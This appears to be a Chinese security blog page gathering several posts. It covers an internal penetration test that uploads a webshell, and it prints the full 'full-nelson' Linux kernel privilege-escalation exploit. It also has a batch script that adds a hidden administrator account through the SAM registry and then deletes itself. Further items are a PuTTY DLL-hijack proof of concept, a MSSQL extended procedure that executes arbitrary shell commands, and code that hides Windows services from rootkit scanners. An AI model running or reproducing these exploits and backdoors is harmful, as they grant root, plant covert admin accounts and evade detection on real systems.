by：vitter@safechina.net
blog：blog.securitycn.net

早就跟相关人员说过 邮箱认证smtp和pop协议要做加密，否则在公司内网，太容易被人sniffer到明文密码了，另外邮箱密码和bbs公用，bbs也是采用的http协 议，没有用https，这些都是问题。虽然我们控制的网络部分已经做过处理了，ip和mac地址做了绑定，即使有人做arp欺骗后，除非不出网关，否则欺 骗后网络到达不了网关之外，因此嗅探明文邮箱密码已经不可能（由于邮箱服务器不在同一网段）。但是对于我们一些共用资源的服务器有公网ip和内网ip且处 于一个相对风险较高，而且没有根据安全级别进行过相应的安全策略的网络环境内，因此一些问题是显而易见的，但是某些人根本不以为然。所以我进行了一次简单 的内部渗透测试。

首先我从有公网ip和内网ip的网络段入手，如公网ip段是222.222.222.0/255.255.255.255，内网ip段192.168.0.0/255.255.255.0。

经过踩点发现222.222.222.77（192.168.0.77）上跑了一个老版本的某php的论坛。经过检测，存在上传漏洞，利用gif89a文件头欺骗漏洞上传webshell。然后上传个nst。

阅读全文...

/*

* Linux Kernel <= 2.6.37 local privilege escalation

* by Dan Rosenberg

* @djrbliss on twitter

*

* Usage:

* gcc full-nelson.c -o full-nelson

* ./full-nelson

*

* This exploit leverages three vulnerabilities to get root, all of which were

* discovered by Nelson Elhage:

*

* CVE-2010-4258

* -------------

* This is the interesting one, and the reason I wrote this exploit. If a

* thread is created via clone(2) using the CLONE_CHILD_CLEARTID flag, a NULL

* word will be written to a user-specified pointer when that thread exits.

* This write is done using put_user(), which ensures the provided destination

* resides in valid userspace by invoking access_ok(). However, Nelson

* discovered that when the kernel performs an address limit override via

* set_fs(KERNEL_DS) and the thread subsequently OOPSes (via BUG, page fault,

* etc.), this override is not reverted before calling put_user() in the exit

* path, allowing a user to write a NULL word to an arbitrary kernel address.

* Note that this issue requires an additional vulnerability to trigger.

*

* CVE-2010-3849

* -------------

* This is a NULL pointer dereference in the Econet protocol. By itself, it's

* fairly benign as a local denial-of-service. It's a perfect candidate to

* trigger the above issue, since it's reachable via sock_no_sendpage(), which

* subsequently calls sendmsg under KERNEL_DS.

*

* CVE-2010-3850

* -------------

* I wouldn't be able to reach the NULL pointer dereference and trigger the

* OOPS if users weren't able to assign Econet addresses to arbitrary

* interfaces due to a missing capabilities check.

*

* In the interest of public safety, this exploit was specifically designed to

* be limited:

*

* * The particular symbols I resolve are not exported on Slackware or Debian

* * Red Hat does not support Econet by default

* * CVE-2010-3849 and CVE-2010-3850 have both been patched by Ubuntu and

* Debian

*

* However, the important issue, CVE-2010-4258, affects everyone, and it would

* be trivial to find an unpatched DoS under KERNEL_DS and write a slightly

* more sophisticated version of this that doesn't have the roadblocks I put in

* to prevent abuse by script kiddies.

*

* Tested on unpatched Ubuntu 10.04 kernels, both x86 and x86-64.

*

* NOTE: the exploit process will deadlock and stay in a zombie state after you

* exit your root shell because the Econet thread OOPSes while holding the

* Econet mutex. It wouldn't be too hard to fix this up, but I didn't bother.

*

* Greets to spender, taviso, stealth, pipacs, jono, kees, and bla

*/

#include <stdio.h>

#include <sys/socket.h>

#include <fcntl.h>

#include <sys/ioctl.h>

#include <string.h>

#include <net/if.h>

#include <sched.h>

#include <stdlib.h>

#include <signal.h>

#include <sys/utsname.h>

#include <sys/mman.h>

#include <unistd.h>

/* How many bytes should we clear in our

* function pointer to put it into userspace? */

#ifdef __x86_64__

#define SHIFT 24

#define OFFSET 3

#else

#define SHIFT 8

#define OFFSET 1

#endif

/* thanks spender... */

unsigned long get_kernel_sym(char *name)

{

FILE *f;

unsigned long addr;

char dummy;

char sname[512];

struct utsname ver;

int ret;

int rep = 0;

int oldstyle = 0;

f = fopen("/proc/kallsyms", "r");

if (f == NULL) {

f = fopen("/proc/ksyms", "r");

if (f == NULL)

goto fallback;

oldstyle = 1;

}

repeat:

ret = 0;

while(ret != EOF) {

if (!oldstyle)

ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, sname);

else {

ret = fscanf(f, "%p %s\n", (void **)&addr, sname);

if (ret == 2) {

char *p;

if (strstr(sname, "_O/") || strstr(sname, "_S."))

continue;

p = strrchr(sname, '_');

if (p > ((char *)sname + 5) && !strncmp(p - 3, "smp", 3)) {

p = p - 4;

while (p > (char *)sname && *(p - 1) == '_')

p--;

*p = '\0';

}

}

}

if (ret == 0) {

fscanf(f, "%s\n", sname);

continue;

}

if (!strcmp(name, sname)) {

fprintf(stdout, " [+] Resolved %s to %p%s\n", name, (void *)addr, rep ? " (via System.map)" : "");

fclose(f);

return addr;

}

}

fclose(f);

if (rep)

return 0;

fallback:

uname(&ver);

if (strncmp(ver.release, "2.6", 3))

oldstyle = 1;

sprintf(sname, "/boot/System.map-%s", ver.release);

f = fopen(sname, "r");

if (f == NULL)

return 0;

rep = 1;

goto repeat;

}

typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);

typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);

_commit_creds commit_creds;

_prepare_kernel_cred prepare_kernel_cred;

static int __attribute__((regparm(3)))

getroot(void * file, void * vma)

{

commit_creds(prepare_kernel_cred(0));

return -1;

}

/* Why do I do this? Because on x86-64, the address of

* commit_creds and prepare_kernel_cred are loaded relative

* to rip, which means I can't just copy the above payload

* into my landing area. */

void __attribute__((regparm(3)))

trampoline()

{

#ifdef __x86_64__

asm("mov $getroot, %rax; call *%rax;");

#else

asm("mov $getroot, %eax; call *%eax;");

#endif

}

/* Triggers a NULL pointer dereference in econet_sendmsg

* via sock_no_sendpage, so it's under KERNEL_DS */

int trigger(int * fildes)

{

int ret;

struct ifreq ifr;

memset(&ifr, 0, sizeof(ifr));

strncpy(ifr.ifr_name, "eth0", IFNAMSIZ);

ret = ioctl(fildes[2], SIOCSIFADDR, &ifr);

if(ret < 0) {

printf("[*] Failed to set Econet address.\n");

return -1;

}

splice(fildes[3], NULL, fildes[1], NULL, 128, 0);

splice(fildes[0], NULL, fildes[2], NULL, 128, 0);

/* Shouldn't get here... */

exit(0);

}

int main(int argc, char * argv[])

{

unsigned long econet_ops, econet_ioctl, target, landing;

int fildes[4], pid;

void * newstack, * payload;

/* Create file descriptors now so there are two

references to them after cloning...otherwise

the child will never return because it

deadlocks when trying to unlock various

mutexes after OOPSing */

pipe(fildes);

fildes[2] = socket(PF_ECONET, SOCK_DGRAM, 0);

fildes[3] = open("/dev/zero", O_RDONLY);

if(fildes[0] < 0 || fildes[1] < 0 || fildes[2] < 0 || fildes[3] < 0) {

printf("[*] Failed to open file descriptors.\n");

return -1;

}

/* Resolve addresses of relevant symbols */

printf("[*] Resolving kernel addresses...\n");

econet_ioctl = get_kernel_sym("econet_ioctl");

econet_ops = get_kernel_sym("econet_ops");

commit_creds = (_commit_creds) get_kernel_sym("commit_creds");

prepare_kernel_cred = (_prepare_kernel_cred) get_kernel_sym("prepare_kernel_cred");

if(!econet_ioctl || !commit_creds || !prepare_kernel_cred || !econet_ops) {

printf("[*] Failed to resolve kernel symbols.\n");

return -1;

}

if(!(newstack = malloc(65536))) {

printf("[*] Failed to allocate memory.\n");

return -1;

}

printf("[*] Calculating target...\n");

target = econet_ops + 10 * sizeof(void *) - OFFSET;

/* Clear the higher bits */

landing = econet_ioctl << SHIFT >> SHIFT;

payload = mmap((void *)(landing & ~0xfff), 2 * 4096,

PROT_READ | PROT_WRITE | PROT_EXEC,

MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, 0, 0);

if ((long)payload == -1) {

printf("[*] Failed to mmap() at target address.\n");

return -1;

}

memcpy((void *)landing, &trampoline, 1024);

clone((int (*)(void *))trigger,

(void *)((unsigned long)newstack + 65536),

CLONE_VM | CLONE_CHILD_CLEARTID | SIGCHLD,

&fildes, NULL, NULL, target);

sleep(1);

printf("[*] Triggering payload...\n");

ioctl(fildes[2], 0, NULL);

if(getuid()) {

printf("[*] Exploit failed to get root.\n");

return -1;

}

printf("[*] Got root!\n");

execl("/bin/sh", "/bin/sh", NULL);

}

一段隐藏用户的bat，注意脚本中的$不能去掉

net user chinadu$ 4shell.org /add

net localgroup administrators chinadu$ /add

Echo HKEY_LOCAL_MACHINE\SAM [1] >>c:/tem.ini

Echo HKEY_LOCAL_MACHINE\SAM\SAM [1] >>c:/tem.ini

Echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains [1] >>c:/tem.ini

Echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account [1] >>c:/tem.ini

Echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users [1] >>c:/tem.ini

Echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names [1] >>c:/tem.ini

regini c:/tem.ini

regedit /e c:\1.reg HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users

net user chinadu$ /del

regedit /s c:\1.reg

Echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names [0] >c:/tem.ini

Echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users [0] >>c:/tem.ini

Echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account [0] >>c:/tem.ini

Echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains [0] >>c:/tem.ini

Echo HKEY_LOCAL_MACHINE\SAM\SAM [0] >>c:/tem.ini

Echo HKEY_LOCAL_MACHINE\SAM\ [0] >>c:/tem.ini

regini c:/tem.ini

del c:\tem.ini

del c:\1.reg

del %0

Thanks for all
Update For Version 7
Not work for free version.

Acunetix WVS Build History

Build v7.0.20100921 - 22nd September 2010

New Security Check:

• Added a security check for the latest OpenX OFC file upload vulnerability
• Added a ASP.NET security check for the ASP.NET padding Oracle vulnerability

Improvements:

• Reduced the number of false positives for Blind SQL injections security checks
• Improved Blind SQL injection tests by adding a number of new tests to detect blind SQL injections in UPDATE/INSERT/...

Bug fixes:

• Fixed: Cookie encoding didn't worked as expected in some cases
• Fixed: Cookie were not always imported from AcuSensor data

阅读全文...

一个良好的渗透测试是什么组成的？

虽然执行一个渗透测试有许多明显的优点——执行渗透测试的价值在于它的结果。这些结果必须是有价值的，而且对于客户来说必须是很容易理解的。有一个常见的误解是认为渗透测试只是使用一些时髦的自动化安全工具，并处理所生成的报告。但是，成功执行一个浸透测试并不仅仅是需要安全工具。虽然这些自动化安全测试工具在实践中扮演了重要的角色，但是它们也是有缺点的。事实上，这些工具一直无法真正模拟一个高深攻击者的行为。不管安全工具完成的报告有多么全面，其中总是有一些需要解释的问题。

让我们看看构成一个良好渗透测试的一些关键因素：

阅读全文...

渗透测试是一种最老的评估计算机系统安全性的方法。在70年代初期，国防部就曾使用这种方法发现了计算机系统的安全漏洞，并促使开发构建更安全系统的程序。渗透测试越来越多地被许多组织用来保证信息系统和服务的安全性，从而使安全性漏洞在暴露之前就被修复。由于恶意代码、黑客、不满员工所造成的网络入侵、数据偷窃和攻击的频率和严重程度会继续增加，所以网络安全漏洞和数据偷窃所造成的风险和代价是极大的。由于企业电子化的兴起及其对安全性的要求，公司网络的远程访问也在增加。事实上，即使网络实现管理的很好，并使用了最新的硬件和软件，也仍然可能受到错误配置或软件缺陷的影响。这可能最终会将敏感信息的访问权限泄漏给入侵者。使用渗透测试工具则能够显著地减少这种情况的发生。

虽然渗透测试的主要目标是发现组织中网络基础架构的安全漏洞；但它也可能有许多次要目标，包括测试组织的安全问题识别和响应能力，测试员工安全知识或测试安全性政策规范等。

阅读全文...

/*

Exploit Title: PuTTY DLL Hijacking Exploit (winmm.dll)

Date: August 25, 2010

Author: storm (storm@gonullyourself.org)

Version: 0.60

Tested on: Windows Vista SP2

http://www.gonullyourself.org/

gcc -shared -o winmm.dll PuTTY-DLL.c -DWIN32_LEAN_AND_MEAN

PuTTY is a standalone program, so just plop the .dll in whatever directory the binary is in.

*/

#include <windows.h>

#define DllExport __declspec (dllexport)

DllExport void aux32Message() { hax(); }

DllExport void auxGetDevCapsA() { hax(); }

DllExport void auxGetDevCapsW() { hax(); }

DllExport void auxGetNumDevs() { hax(); }

DllExport void auxGetVolume() { hax(); }

DllExport void auxOutMessage() { hax(); }

DllExport void auxSetVolume() { hax(); }

DllExport void CloseDriver() { hax(); }

DllExport void DefDriverProc() { hax(); }

DllExport void DriverCallback() { hax(); }

DllExport void DrvGetModuleHandle() { hax(); }

DllExport void GetDriverModuleHandle() { hax(); }

DllExport void joy32Message() { hax(); }

DllExport void joyConfigChanged() { hax(); }

DllExport void joyGetDevCapsA() { hax(); }

DllExport void joyGetDevCapsW() { hax(); }

DllExport void joyGetNumDevs() { hax(); }

DllExport void joyGetPos() { hax(); }

DllExport void joyGetPosEx() { hax(); }

DllExport void joyGetThreshold() { hax(); }

DllExport void joyReleaseCapture() { hax(); }

DllExport void joySetCapture() { hax(); }

DllExport void joySetThreshold() { hax(); }

DllExport void mci32Message() { hax(); }

DllExport void mciDriverNotify() { hax(); }

DllExport void mciDriverYield() { hax(); }

DllExport void mciExecute() { hax(); }

DllExport void mciFreeCommandResource() { hax(); }

DllExport void mciGetCreatorTask() { hax(); }

DllExport void mciGetDeviceIDA() { hax(); }

DllExport void mciGetDeviceIDFromElementIDA() { hax(); }

DllExport void mciGetDeviceIDFromElementIDW() { hax(); }

DllExport void mciGetDeviceIDW() { hax(); }

DllExport void mciGetDriverData() { hax(); }

DllExport void mciGetErrorStringA() { hax(); }

DllExport void mciGetErrorStringW() { hax(); }

DllExport void mciGetYieldProc() { hax(); }

DllExport void mciLoadCommandResource() { hax(); }

DllExport void mciSendCommandA() { hax(); }

DllExport void mciSendCommandW() { hax(); }

DllExport void mciSendStringA() { hax(); }

DllExport void mciSendStringW() { hax(); }

DllExport void mciSetDriverData() { hax(); }

DllExport void mciSetYieldProc() { hax(); }

DllExport void mid32Message() { hax(); }

DllExport void midiConnect() { hax(); }

DllExport void midiDisconnect() { hax(); }

DllExport void midiInAddBuffer() { hax(); }

DllExport void midiInClose() { hax(); }

DllExport void midiInGetDevCapsA() { hax(); }

DllExport void midiInGetDevCapsW() { hax(); }

DllExport void midiInGetErrorTextA() { hax(); }

DllExport void midiInGetErrorTextW() { hax(); }

DllExport void midiInGetID() { hax(); }

DllExport void midiInGetNumDevs() { hax(); }

DllExport void midiInMessage() { hax(); }

DllExport void midiInOpen() { hax(); }

DllExport void midiInPrepareHeader() { hax(); }

DllExport void midiInReset() { hax(); }

DllExport void midiInStart() { hax(); }

DllExport void midiInStop() { hax(); }

DllExport void midiInUnprepareHeader() { hax(); }

DllExport void midiOutCacheDrumPatches() { hax(); }

DllExport void midiOutCachePatches() { hax(); }

DllExport void midiOutClose() { hax(); }

DllExport void midiOutGetDevCapsA() { hax(); }

DllExport void midiOutGetDevCapsW() { hax(); }

DllExport void midiOutGetErrorTextA() { hax(); }

DllExport void midiOutGetErrorTextW() { hax(); }

DllExport void midiOutGetID() { hax(); }

DllExport void midiOutGetNumDevs() { hax(); }

DllExport void midiOutGetVolume() { hax(); }

DllExport void midiOutLongMsg() { hax(); }

DllExport void midiOutMessage() { hax(); }

DllExport void midiOutOpen() { hax(); }

DllExport void midiOutPrepareHeader() { hax(); }

DllExport void midiOutReset() { hax(); }

DllExport void midiOutSetVolume() { hax(); }

DllExport void midiOutShortMsg() { hax(); }

DllExport void midiOutUnprepareHeader() { hax(); }

DllExport void midiStreamClose() { hax(); }

DllExport void midiStreamOpen() { hax(); }

DllExport void midiStreamOut() { hax(); }

DllExport void midiStreamPause() { hax(); }

DllExport void midiStreamPosition() { hax(); }

DllExport void midiStreamProperty() { hax(); }

DllExport void midiStreamRestart() { hax(); }

DllExport void midiStreamStop() { hax(); }

DllExport void mixerClose() { hax(); }

DllExport void mixerGetControlDetailsA() { hax(); }

DllExport void mixerGetControlDetailsW() { hax(); }

DllExport void mixerGetDevCapsA() { hax(); }

DllExport void mixerGetDevCapsW() { hax(); }

DllExport void mixerGetID() { hax(); }

DllExport void mixerGetLineControlsA() { hax(); }

DllExport void mixerGetLineControlsW() { hax(); }

DllExport void mixerGetLineInfoA() { hax(); }

DllExport void mixerGetLineInfoW() { hax(); }

DllExport void mixerGetNumDevs() { hax(); }

DllExport void mixerMessage() { hax(); }

DllExport void mixerOpen() { hax(); }

DllExport void mixerSetControlDetails() { hax(); }

DllExport void mmDrvInstall() { hax(); }

DllExport void mmGetCurrentTask() { hax(); }

DllExport void mmioAdvance() { hax(); }

DllExport void mmioAscend() { hax(); }

DllExport void mmioClose() { hax(); }

DllExport void mmioCreateChunk() { hax(); }

DllExport void mmioDescend() { hax(); }

DllExport void mmioFlush() { hax(); }

DllExport void mmioGetInfo() { hax(); }

DllExport void mmioInstallIOProcA() { hax(); }

DllExport void mmioInstallIOProcW() { hax(); }

DllExport void mmioOpenA() { hax(); }

DllExport void mmioOpenW() { hax(); }

DllExport void mmioRead() { hax(); }

DllExport void mmioRenameA() { hax(); }

DllExport void mmioRenameW() { hax(); }

DllExport void mmioSeek() { hax(); }

DllExport void mmioSendMessage() { hax(); }

DllExport void mmioSetBuffer() { hax(); }

DllExport void mmioSetInfo() { hax(); }

DllExport void mmioStringToFOURCCA() { hax(); }

DllExport void mmioStringToFOURCCW() { hax(); }

DllExport void mmioWrite() { hax(); }

DllExport void mmsystemGetVersion() { hax(); }

DllExport void mmTaskBlock() { hax(); }

DllExport void mmTaskCreate() { hax(); }

DllExport void mmTaskSignal() { hax(); }

DllExport void mmTaskYield() { hax(); }

DllExport void mod32Message() { hax(); }

DllExport void mxd32Message() { hax(); }

DllExport void NotifyCallbackData() { hax(); }

DllExport void OpenDriver() { hax(); }

DllExport void PlaySound() { hax(); }

DllExport void PlaySoundA() { hax(); }

DllExport void PlaySoundW() { hax(); }

DllExport void SendDriverMessage() { hax(); }

DllExport void sndPlaySoundA() { hax(); }

DllExport void sndPlaySoundW() { hax(); }

DllExport void tid32Message() { hax(); }

DllExport void timeBeginPeriod() { hax(); }

DllExport void timeEndPeriod() { hax(); }

DllExport void timeGetDevCaps() { hax(); }

DllExport void timeGetSystemTime() { hax(); }

DllExport void timeGetTime() { hax(); }

DllExport void timeKillEvent() { hax(); }

DllExport void timeSetEvent() { hax(); }

DllExport void waveInAddBuffer() { hax(); }

DllExport void waveInClose() { hax(); }

DllExport void waveInGetDevCapsA() { hax(); }

DllExport void waveInGetDevCapsW() { hax(); }

DllExport void waveInGetErrorTextA() { hax(); }

DllExport void waveInGetErrorTextW() { hax(); }

DllExport void waveInGetID() { hax(); }

DllExport void waveInGetNumDevs() { hax(); }

DllExport void waveInGetPosition() { hax(); }

DllExport void waveInMessage() { hax(); }

DllExport void waveInOpen() { hax(); }

DllExport void waveInPrepareHeader() { hax(); }

DllExport void waveInReset() { hax(); }

DllExport void waveInStart() { hax(); }

DllExport void waveInStop() { hax(); }

DllExport void waveInUnprepareHeader() { hax(); }

DllExport void waveOutBreakLoop() { hax(); }

DllExport void waveOutClose() { hax(); }

DllExport void waveOutGetDevCapsA() { hax(); }

DllExport void waveOutGetDevCapsW() { hax(); }

DllExport void waveOutGetErrorTextA() { hax(); }

DllExport void waveOutGetErrorTextW() { hax(); }

DllExport void waveOutGetID() { hax(); }

DllExport void waveOutGetNumDevs() { hax(); }

DllExport void waveOutGetPitch() { hax(); }

DllExport void waveOutGetPlaybackRate() { hax(); }

DllExport void waveOutGetPosition() { hax(); }

DllExport void waveOutGetVolume() { hax(); }

DllExport void waveOutMessage() { hax(); }

DllExport void waveOutOpen() { hax(); }

DllExport void waveOutPause() { hax(); }

DllExport void waveOutPrepareHeader() { hax(); }

DllExport void waveOutReset() { hax(); }

DllExport void waveOutRestart() { hax(); }

DllExport void waveOutSetPitch() { hax(); }

DllExport void waveOutSetPlaybackRate() { hax(); }

DllExport void waveOutSetVolume() { hax(); }

DllExport void waveOutUnprepareHeader() { hax(); }

DllExport void waveOutWrite() { hax(); }

DllExport void wid32Message() { hax(); }

DllExport void wod32Message() { hax(); }

DllExport void WOW32DriverCallback() { hax(); }

DllExport void WOW32ResolveMultiMediaHandle() { hax(); }

DllExport void WOWAppExit() { hax(); }

int hax()

{

WinExec("calc", 0);

exit(0);

return 0;

}

BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)

{

hax();

return 0;

}

来源：冰点论坛 2月

主要代码：

在VC6里面新建一个储存过程项目，在proc.cpp中写入如下代码：

#include <stdafx.h>

#include <shellapi.h>

#define XP_NOERROR 0

#define XP_ERROR 1

#define MAXCOLNAME 25

#define MAXNAME 25

#define MAXTEXT 255

#ifdef __cplusplus

extern “C” {

#endif

RETCODE __declspec(dllexport) xp_hello(SRV_PROC *srvproc);

#ifdef __cplusplus

}

#endif

RETCODE __declspec(dllexport) xp_hello(SRV_PROC *srvproc)

{

/***************************** 说明 *************************

由于本人人品不好还是怎么的，库里没有srv_paraminfo函数，卧槽，

无赖之下，只好用老式的srv_paramdata

*************************************************************/

int bufLen;

DBCHAR spName[MAXNAME];

DBCHAR spText[MAXTEXT];

DBCHAR spBuf[MAXTEXT];

unsigned char cmdline[255] = “”;

if(srv_rpcparams(srvproc) != 1) return XP_ERROR; //参数判断，如果参数不是1个就立即退出

bufLen = srv_paramlen(srvproc,1);

if(!bufLen) return XP_ERROR;

wsprintf(spBuf,(DBCHAR*)srv_paramdata(srvproc,1));spBuf[bufLen] = ‘\0′; //获取第一个参数的值

wsprintf(spName, “xp_hello”);

wsprintf(spText, “%s Run command:[%s]\r\n\t\t\tMSN:ylbhz@hotmail.com”, spName,spBuf);

srv_sendmsg(srvproc,SRV_MSG_INFO,0,(DBTINYINT)0,(DBTINYINT)0,NULL,0,0,spText,SRV_NULLTERM); //发送消息

wsprintf((char*)cmdline,”/c %s”,spBuf); //构造参数

ShellExecute(0,”open”,”cmd.exe”,(char*)cmdline,NULL,SW_SHOW); //执行命令

return XP_NOERROR ;

}

阅读全文...

1、setup_config_box :
putty 的界面的处理方式是很值得研究研究的。 首先要考虑在原有的界面上把新加的输入passowrd 的文本框放在什么地方，个人认为把新加入的文本框放在原有的输入port 端口后面的文本框后面是一个比较好的选择。
修改： line ：1155 行的

ctrl_columns(s, 2, 75, 25);

改为

ctrl_columns(s, 3, 50, 25,25);

后面的数字只是一个比例。
添加： line : 1165 后加入：
阅读全文...

图文：udb311
主题：MSSQL内网渗透案例分析
发表：黑白前线

描述：对于内网渗透技术一直感觉很神秘，手中正巧有一个webshell是内网服务器。借此机会练习下内网入侵渗透技术！本文敏感信息以屏蔽！密码都以*号代替。此次过程主要运用到xp_cmdshell恢复与执行，再通过自己的灵活思维运用。

环境：2003 SERVER
IIS ：6.0 支持php
数据库：MSSQL和MYSQL
网站类型：ASPX

本文重点讲述内网渗透提权部分，对于WEBSHELL不在描述。对于了解入侵渗透的朋友都知道，拿到webshell后服务器能否提权就要先找提权的漏洞所在。从本站的角度来看，存在MSSQL、MYSQL支持ASPX和PHP可以说权限够大的了。先来看看目录能穷举出来哪些东西。先看程序目录，很平常么。没现有SU和MYSQL之类的信息。

阅读全文...

本文阐述：文章从网站入侵到内网渗透提权，作者给大家带来了一篇精彩的内网渗透文章。读后此文你能清晰的认识到内网入侵的细节技术。

由于平时比较忙，用了很久的VPN肉鸡飞掉了，近来正好有时间于是打开google搜索upfile.asp开始找肉鸡，来了台湾某XX站，http://xxx.xxx.tw/xx/upfile.asp，为了不必要的麻烦，我隐藏了敏感内容。直接到传asp提示错误，那么直接传了gif以后，查看上传路径发现自己重命名了，如果没有重命名的话在IIS6下百分之90以上可以拿shell了，除去目录末有执行脚本权限。最后抓包分析改上传路径，最后得到一个shell，图1。具体方法翻翻以前杂志或google找吧，一找一大堆。

执行命令后，发现权限还比较大，能够执行一些简单命令，像net user、ipconfig /all等等。。

阅读全文...

来自：ASM

过RKU,GMAER的dll模块检查的代码，就两句：

ldm->HashLinks.Blink->Flink = ldm->HashLinks.Flink;
ldm->HashLinks.Flink->Blink = ldm->HashLinks.Blink;

//下面是一个ring3下隐藏服务的代码，也是抄别人小小修改了一下而已的：

#include <stdio.h>

#include <stdlib.h>

#include <windows.h>

#include <Tlhelp32.h>

// 几个Undocument的结构

typedef struct _SC_SERVICE_PROCESS SC_SERVICE_PROCESS, *PSC_SERVICE_PROCESS;

typedef struct _SC_DEPEND_SERVICE SC_DEPEND_SERVICE, *PSC_DEPEND_SERVICE;

typedef struct _SC_SERVICE_RECORD SC_SERVICE_RECORD, *PSC_SERVICE_RECORD;

typedef struct _SC_SERVICE_PROCESS

{

PSC_SERVICE_PROCESS Previous;

PSC_SERVICE_PROCESS Next;

WCHAR *ImagePath;

DWORD Pid;

DWORD NumberOfServices;

// ...

} SC_SERVICE_PROCESS, *PSC_SERVICE_PROCESS;

typedef struct _SC_DEPEND_SERVICE

{

PSC_DEPEND_SERVICE Next;

DWORD Unknow;

PSC_SERVICE_RECORD Service;

// ...

} SC_DEPEND_SERVICE, *PSC_DEPEND_SERVICE;

typedef struct _SC_SERVICE_RECORD

{

PSC_SERVICE_RECORD Previous;

PSC_SERVICE_RECORD Next;

WCHAR *ServiceName;

WCHAR *DisplayName;

DWORD Index;

DWORD Unknow0;

DWORD sErv;

DWORD ControlCount;

DWORD Unknow1;

PSC_SERVICE_PROCESS Process;

SERVICE_STATUS Status;

DWORD StartType;

DWORD ErrorControl;

DWORD TagId;

PSC_DEPEND_SERVICE DependOn;

PSC_DEPEND_SERVICE Depended;

// ...

} SC_SERVICE_RECORD, *PSC_SERVICE_RECORD;

int WINAPI UnicodeToAnsiStr(OUT char *lpChar, IN WCHAR *lpWideChar)

{

int iLen;

iLen = WideCharToMultiByte(CP_ACP, 0, lpWideChar, -1, NULL, 0, NULL, NULL);

if ((iLen > 1) || (iLen < 20))

{

ZeroMemory(lpChar, 40);

iLen = WideCharToMultiByte(CP_ACP, 0, lpWideChar, -1, lpChar, iLen, NULL, NULL);

}

return iLen;

}

BOOL SetDebugPrivilege()

{

BOOL bRet = FALSE;

HANDLE hToken = NULL;

LUID luid;

TOKEN_PRIVILEGES tp;

if (OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, &hToken) &&

LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &luid))

{

tp.PrivilegeCount = 1;

tp.Privileges[0].Luid = luid;

tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;

bRet = AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(TOKEN_PRIVILEGES), NULL, NULL);

}

if (hToken) CloseHandle(hToken);

return bRet;

}

DWORD GetProcessIdByName(char *Name)

{

BOOL bRet = FALSE;

HANDLE hProcessSnap = NULL;

PROCESSENTRY32 pe32 = { 0 };

DWORD Pid = -1;

hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);

if (INVALID_HANDLE_VALUE == hProcessSnap) return -1;

pe32.dwSize = sizeof(PROCESSENTRY32);

if (Process32First(hProcessSnap, &pe32))

{

do

{

if (!lstrcmpi(pe32.szExeFile, Name ) )

{

Pid = pe32.th32ProcessID;

break;

}

}

while (Process32Next(hProcessSnap, &pe32));

}

CloseHandle(hProcessSnap);

return Pid;

}

// 修改内存属性为指定值

void ProtectWriteDword(HANDLE hProcess, DWORD *Addr, DWORD Value)

{

MEMORY_BASIC_INFORMATION mbi;

DWORD dwOldProtect, dwWritten;

VirtualQueryEx(hProcess, Addr, &mbi, sizeof(mbi));

VirtualProtectEx(hProcess, mbi.BaseAddress, mbi.RegionSize, PAGE_READWRITE, &mbi.Protect);

WriteProcessMemory(hProcess, Addr, &Value, sizeof(DWORD), &dwWritten);

VirtualProtectEx(hProcess, mbi.BaseAddress, mbi.RegionSize, mbi.Protect, &dwOldProtect);

}

//寻找服务链表

PSC_SERVICE_RECORD FindFirstServiceRecord(HANDLE hProcess)

{

char FileName[MAX_PATH+1];

HANDLE hFile, hFileMap;

UCHAR * pMap;

DWORD dwSize, dwSizeHigh, i, dwRead;

SC_SERVICE_RECORD SvcRd, *pSvcRd, *pRet = NULL;

GetSystemDirectory( FileName, MAX_PATH );

strcat( FileName,"\\Services.exe");

hFile = CreateFile(FileName, GENERIC_READ, FILE_SHARE_READ,

NULL, OPEN_EXISTING, 0, NULL);

if (INVALID_HANDLE_VALUE == hFile) return NULL;

dwSizeHigh = 0;

dwSize = GetFileSize(hFile, &dwSizeHigh);

hFileMap = CreateFileMapping(hFile, NULL, PAGE_READONLY, 0, 0, NULL);

if (NULL == hFileMap) return NULL;

pMap = (UCHAR*)MapViewOfFile(hFileMap, FILE_MAP_READ, 0, 0, 0);

if (NULL == pMap) return NULL;

dwSize -= 12;

for (i=0; i<dwSize; ++i)

{

// 搜索services!ScGetServiceDatabase特征代码

if (*(DWORD*)(pMap+i) == 0xa1909090 &&

*(DWORD*)(pMap+i+8) == 0x909090c3)

{

if (ReadProcessMemory(hProcess, *(PVOID*)(pMap+i+4), &pSvcRd, sizeof(PVOID), &dwRead) &&

ReadProcessMemory(hProcess, pSvcRd, &SvcRd, sizeof(SvcRd), &dwRead) &&

SvcRd.sErv == 'vrEs') // ServiceRecord结构的特征

{

pRet = pSvcRd;

break;

}

}

}

UnmapViewOfFile(pMap);

CloseHandle(hFileMap);

CloseHandle(hFile);

//printf( "addr: 0x%08x\n", (DWORD *)pRet );

return pRet;

}

// 隐藏服务

BOOL HideService(char *Name)

{

DWORD Pid;

HANDLE hProcess;

SC_SERVICE_RECORD SvcRd, *pSvcRd;

DWORD dwRead, dwNameSize;

WCHAR SvcName[MAX_PATH] = { 0 };

char lpSvcName[256] = {0};

dwNameSize = strlen(Name)*2; //UNICODE的话，长度要乘以2

if (dwNameSize > sizeof(SvcName))

{

return FALSE;

}

Pid = GetProcessIdByName("Services.exe");

if (Pid == -1)

{

printf("get pid error\r\n");

return FALSE;

}

if(!SetDebugPrivilege())

{

printf("SetDebugPrivilege error\r\n");

return FALSE;

}

